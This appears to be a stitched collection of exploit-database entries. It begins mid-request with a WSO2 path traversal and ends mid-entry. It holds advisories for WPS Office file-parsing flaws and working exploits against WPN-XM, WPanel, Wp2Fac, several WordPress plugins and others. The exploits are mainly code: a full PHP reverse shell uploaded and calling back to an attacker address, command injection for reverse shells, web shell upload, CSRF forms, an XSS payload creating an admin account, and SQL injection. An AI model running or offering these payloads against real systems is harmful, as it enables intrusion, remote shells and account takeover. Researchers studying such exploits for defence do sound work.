Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache
extensionName=../../../../INSTALL.txt
---------------Returned Headers in Response------------------
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-12-31: Francis Provencher from COSIG report the issue to WPS;
2016-01-04: WPS security confirm this issue;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
User interaction is required to exploit this vulnerability in that the target must open a malicious file.
By providing a malformed .xls file, an attacker can cause an heap memory corruption.
An attacker could leverage this to execute arbitrary code under the context of the WPS Spreadsheet process.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-07.xlsx
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39398.zip
###############################################################################
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version before 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-24: Francis Provencher from COSIG report the issue to WPS;
2015-12-06: WPS security confirm this issue;
2016-01-01: COSIG ask an update status;
2016-01-07: COSIG ask an update status;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
The specific flaw exists within the handling of a crafted PPT files with an invalid value into “texttype” in the “clientTextBox”
into a “DrawingContainer”. An heap memory corruption occured and could allow remote attackers to execute arbitrary code
on vulnerable installations of WPS. User interaction is required to exploit this vulnerability, the target must open a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-04.ppt
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39395.zip
###############################################################################
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-12-31: Francis Provencher from COSIG report the issue to WPS;
2016-01-04: WPS security confirm this issue;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
User interaction is required to exploit this vulnerability in that the target must open a malicious file.
The specific flaw exists within the handling of a crafted Presentation files with an invalid “Length” header in a drawingContainer.
By providing a malformed .ppt file, an attacker can cause an memory corruption by dereferencing an uninitialized pointer.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-06.ppt
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39397.zip
###############################################################################
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version before 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-24: Francis Provencher from COSIG report the issue to WPS;
2015-12-06: WPS security confirm this issue;
2016-01-01: COSIG ask an update status;
2016-01-07: COSIG ask an update status;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
User interaction is required to exploit this vulnerability, the target must open a malicious file.
The specific flaw exists within the handling of a crafted DOC files with an invalid value into the “OneTableDocumentStream”
data section causing a stackbase memory corruption.
###############################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-05.doc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39396.zip
###############################################################################
# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://wpn-xm.org/
# Software Link : https://github.com/WPN-XM/WPN-XM/
# Tested Version: 0.8.6
# Tested on: Windows 10 using XAMPP
# Vulnerability Type: Local File Inclusion (LFI) & directory traversal
(path traversal)
CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows
unauthenticated directory traversal and Local File Inclusion through the
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello
(without php) GET request.
Proof of concept:
To detect: http://localhost/tools/webinterface/index.php?page=)
The parameter "page" can be modified and load a php file in the server.
Example, In C:\:hello.php with this content:
C:\>type hello.php
<?php
echo "HELLO FROM C:\\hello.php";
?>
To Get hello.php in c:\ :
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello
Note: hello without ".php".
And you can see the PHP message into the browser at the start.
Response:
HELLO FROM C:\hello.php<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>WP?-XM Server Stack for Windows - 0.8.6</title>
<meta name="description" content="WP?-XM Server Stack for Windows -
Webinterface.">
<meta name="author" content="Jens-André Koch" />
<link rel="shortcut icon" href="favicon.ico" />
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the
/tools/webinterface/index.php, in multiple parameters.
Proof of concept:
http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
Vendor:
===========
wpn-xm.org
Product:
==============================================
WPN-XM Serverstack for Windows - Version 0.8.6
WPN-XM is a free and open-source web server solution stack for professional
PHP development on the Windows platform.
Vulnerability Type:
================================
CSRF - MySQL / PHP.INI Hijacking
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote
attackers to compromise an authenticated user if they visit
a malicious webpage or click an attacker supplied link. Attackers can
modify the 'PHP.INI' file to change arbitrary PHPs settings
like enable 'allow_url_include' or changing the default MySQL username &
password settings etc...
Exploit code(s):
===============
1) Hijack MySQL Account Default Settings
<iframe name="ifrm" width="600" height="700" name="hidden-form"></iframe>
<form target="ifrm" id="CSRF-MySQL-Username" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="page" value="config">
<input type="hidden" name="action" value="update-phpini-setting">
<input type="hidden" name="directive" value="mysql.default_user" />
<input type="hidden" name="value" value="hyp3rlinx" />
<script>document.getElementById('CSRF-MySQL-Username').submit()</script>
</form>
<form target="ifrm" id="CSRF-MySQL-PWD" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="page" value="config">
<input type="hidden" name="action" value="update-phpini-setting">
<input type="hidden" name="directive" value="mysql.default_password">
<input type="hidden" name="value" value="PWNED!" />
<script>document.getElementById('CSRF-MySQL-PWD').submit()</script>
</form>
2) Hijack PHP.INI Settings
<form id="CSRF-PHP-INI" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="directive" value="allow_url_include" />
<input type="hidden" name="value" value="On" />
<script>document.getElementById('CSRF-PHP-INI').submit()</script>
</form>
Disclosure Timeline:
=====================================
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
=================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx
# Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)
# Date: 2022-12-05
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/wpforms-lite
# Version: 1.7.8
# Tested on: Windows 10
# CVE: N/A
1. Description:
This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>
# Exploit Title: WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 07/06/2021
# Exploit Author: Sentinal920
# Vendor Homepage: https://github.com/wpanel
# Software Link: https://github.com/wpanel/wpanel4-cms
# Version: 4.3.1
# Tested on: Linux
import requests
import random,string
# Change This
###################################
url = 'http://192.168.182.134:8080'
email = 'admin@localhost.com'
password = 'admin'
###################################
# PHP reverse shell used: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php
# Works on linux/windows/mac
###########################################################################
# Make sure to change lhost and lport in the reverse shell below (Line 223)
###########################################################################
# Get_Cookies
r = requests.get(url)
r2 = requests.get(url,cookies=r.cookies)
cookie = r2.cookies['wpanel_csrf_cookie']
name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(9))
payload = '''
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="wpanel_csrf_token"
'''+cookie+'''
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="titulo"
'''+name+'''
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="descricao"
'''+name+'''
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="tags"
tesad
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="userfile"; filename="php-reverse-shell.php"
Content-Type: application/x-php
<?php
class Shell {
private $addr = null;
private $port = null;
private $os = null;
private $shell = null;
private $descriptorspec = array(
0 => array('pipe', 'r'), // shell can read from STDIN
1 => array('pipe', 'w'), // shell can write to STDOUT
2 => array('pipe', 'w') // shell can write to STDERR
);
private $options = array(); // proc_open() options
private $buffer = 1024; // read/write buffer size
private $clen = 0; // command length
private $error = false; // stream read/write error
public function __construct($addr, $port) {
$this->addr = $addr;
$this->port = $port;
}
private function detect() {
$detected = true;
if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
$this->os = 'LINUX';
$this->shell = '/bin/sh';
} else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
$this->os = 'WINDOWS';
$this->shell = 'cmd.exe';
$this->options['bypass_shell'] = true; // we do not want a shell within a shell
} else {
$detected = false;
echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
}
return $detected;
}
private function daemonize() {
$exit = false;
if (!function_exists('pcntl_fork')) {
echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
} else if (($pid = @pcntl_fork()) < 0) {
echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
} else if ($pid > 0) {
$exit = true;
echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
} else if (posix_setsid() < 0) {
// once daemonized you will actually no longer see the script's dump
echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
} else {
echo "DAEMONIZE: Completed successfully!\n";
}
return $exit;
}
private function settings() {
@error_reporting(0);
@set_time_limit(0); // do not impose the script execution time limit
@umask(0); // set the file/directory permissions - 666 for files and 777 for directories
}
private function dump($data) {
$data = str_replace('<', '<', $data);
$data = str_replace('>', '>', $data);
echo $data;
}
private function read($stream, $name, $buffer) {
if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
}
return $data;
}
private function write($stream, $name, $data) {
if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
}
return $bytes;
}
// read/write method for non-blocking streams
private function rw($input, $output, $iname, $oname) {
while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
$this->dump($data); // script's dump
}
}
// read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
// we must read the exact byte length from a stream and not a single byte more
private function brw($input, $output, $iname, $oname) {
$size = fstat($input)['size'];
if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
// for some reason Windows OS pipes STDIN into STDOUT
// we do not like that
// we need to discard the data from the stream
while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
$this->clen -= $bytes;
$size -= $bytes;
}
}
while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
$size -= $bytes;
$this->dump($data); // script's dump
}
}
public function run() {
if ($this->detect() && !$this->daemonize()) {
$this->settings();
// ----- SOCKET BEGIN -----
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if (!$socket) {
echo "SOC_ERROR: {$errno}: {$errstr}\n";
} else {
stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
// ----- SHELL BEGIN -----
$process = @proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options);
if (!$process) {
echo "PROC_ERROR: Cannot start the shell\n";
} else {
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
}
// ----- WORK BEGIN -----
@fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n");
do {
if (feof($socket)) { // check for end-of-file on SOCKET
echo "SOC_ERROR: Shell connection has been terminated\n"; break;
} else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running
echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams
} // use proc_get_status() instead
$streams = array(
'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
'write' => null,
'except' => null
);
$num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS
if ($num_changed_streams === false) {
echo "STRM_ERROR: stream_select() failed\n"; break;
} else if ($num_changed_streams > 0) {
if ($this->os === 'LINUX') {
if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
} else if ($this->os === 'WINDOWS') {
// order is important
if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
}
}
} while (!$this->error);
// ------ WORK END ------
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
}
// ------ SHELL END ------
fclose($socket);
}
// ------ SOCKET END ------
}
}
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('192.168.182.136', 9000);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="status"
1
-----------------------------45668787242378192391383974033--
'''
data = 'wpanel_csrf_token='+cookie+'&email='+email+'&password='+password
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
# Login_as_admin
r3 = requests.post(url+'/index.php/admin/login',cookies=r.cookies,headers=headers,data=data)
def exploit_gallery():
# Adding_Reverse_Shell
headers2 = {'Content-Type': 'multipart/form-data; boundary=---------------------------45668787242378192391383974033'}
r4 = requests.post(url + '/index.php/admin/galleries/add',cookies=r.cookies,headers=headers2,data=payload)
print('')
print('Shell Uploaded as: '+name)
print('')
print('Visit: '+url+'/index.php/admin/galleries')
print('OR')
print('Visit: '+url+'/index.php/galleries')
print('')
exploit_gallery()
#def exploit_post():
#def exloit_pages():
#def dashboard_avatar_image():
# Exploit Title: Wp2Fac v1.0 - OS Command Injection
# Date: 2023-08-27
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://github.com/metinyesil/wp2fac
# Tested on: Kali Linux & Windows 11
# CVE: N/A
import requests
def send_post_request(host, revshell):
url = f'http://{host}/send.php'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)
Gecko/20100101 Firefox/102.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': f'http://{host}',
'Connection': 'close',
'Referer': f'http://{host}/',
}
data = {
'numara': f'1234567890 & {revshell} &;'
}
response = requests.post(url, headers=headers, data=data)
return response.text
host = input("Target IP: ")
revshell = input("Reverse Shell Command: ")
print("Check your listener!")
send_post_request(host, revshell)
# Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-useronline/
# Date: 2024-06-12
# Exploit Author: Onur Göğebakan
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
# Category: Web Application
# Version: 2.88.0
# Tested on: WordPress 6.5.4 - Windows 10
# CVE : CVE-2022-2941
# Explanation:
A new administrator user can be added to WordPress using a stored XSS vulnerability.
# Exploit:
1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings
2. Click Save and intercept the request.
3. Change `naming%5Bbots%5D` parameter value with belowed payload
```
%3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E
```
4. Payload executed when user visited http://poc.test/wp-admin/index.php?page=useronline
5. Administrator user added with admin:admin credentials.
# Decoded payload
```
function handleResponse() {
var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('POST', '/wp-admin/user-new.php', true);
changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
var params = 'action=createuser&_wpnonce_create-user=' + nonce +
'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' +
'&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User';
changeReq.send(params);
}
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/wp-admin/user-new.php', true);
req.send();
```
#!/usr/bin/env
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint
def handler(sig,frame):
print ("[!]Saliendo")
sys.exit(1)
signal.signal(signal.SIGINT,handler)
def commandexec(command):
exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
params = {
"cmd":command
}
r=requests.get(exec_url,params=params)
soup = BeautifulSoup(r.text, 'html.parser')
text = soup.get_text()
print (text)
def exploit():
global url
url = sys.argv[1]
command = sys.argv[2]
upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
headers = {
'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
'Connection': "close"
}
payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"
try:
r=requests.post(upload_url,data=payload,headers=headers)
#pprint(r.json())
commandexec(command)
except:
print("[!] Algo ha salido mal...")
def help():
print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")
if __name__ == '__main__':
if len(sys.argv) != 3:
help()
else:
exploit()
# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
# Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320
import requests
import hashlib
import time
# Set the target URL
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"
# Set the user agent string
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# Generate the nonce value
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()
# Set the data payload
payload = {
"wpss_nonce": nonce,
"wpss_setting_1": "value_1",
"wpss_setting_2": "value_2",
# Add additional settings as needed
}
# Set the request headers
headers = {
"User-Agent": user_agent,
"Referer": url,
"Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
# Add additional headers as needed
}
# Send the POST request
response = requests.post(url, data=payload, headers=headers)
# Check the response status code
if response.status_code == 200:
print("Request successful")
else:
print("Request failed")
# Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)
# Date: 13/02/2022
# Exploit Author: psychoSherlock
# Vendor Homepage: https://wp-statistics.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip
# Version: 13.1.5 and prior
# Tested on: wp-statistics 13.1.5
# CVE : CVE-2022-25148
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# CVSS Score: 8.4 (High)
import argparse
import requests
import re
import urllib.parse
def main():
parser = argparse.ArgumentParser(description="CVE-2022-25148")
parser.add_argument('-u', '--url', required=True,
help='Wordpress base URL')
args = parser.parse_args()
baseUrl = args.url
payload = "IF(1=1, sleep(5), 1)"
wp_session = requests.session()
resp = wp_session.get(baseUrl)
nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text).group(1)
print(f"Gathered Nonce: {nonce}")
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}
payload = urllib.parse.quote_plus(payload)
exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id={payload}&search_query&page_uri=/&user_id=0'
exploit_url = baseUrl + exploit
print(f'\nSending: {exploit_url}')
resp = wp_session.get(exploit_url, headers=headers)
if float(resp.elapsed.total_seconds()) >= 5.0:
print("\n!!! Target is vulnerable !!!")
print(f'\nTime taken: {resp.elapsed.total_seconds()}')
else:
print('Target is not vulnerable')
if __name__ == "__main__":
main()
# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
# Date: 2019-09-10
# Exploit Author: strider
# Software Link: https://github.com/anttiviljami/wp-server-log-viewer
# Version: 1.0
# Tested on: Debian 10 Buster x64 / Kali Linux
# CVE : None
====================================[Description]====================================
This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.
====================================[Codepart]====================================
if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {
// new log was added
$logs = get_option( 'server_logs' );
if( is_null( $logs ) ) {
$logs = [];
}
$log = trim( $_GET['logpath'] ); //only trimmed string no escaping
$logs[] = $log; //here the log will be added without security checks
$logs = array_values( $logs );
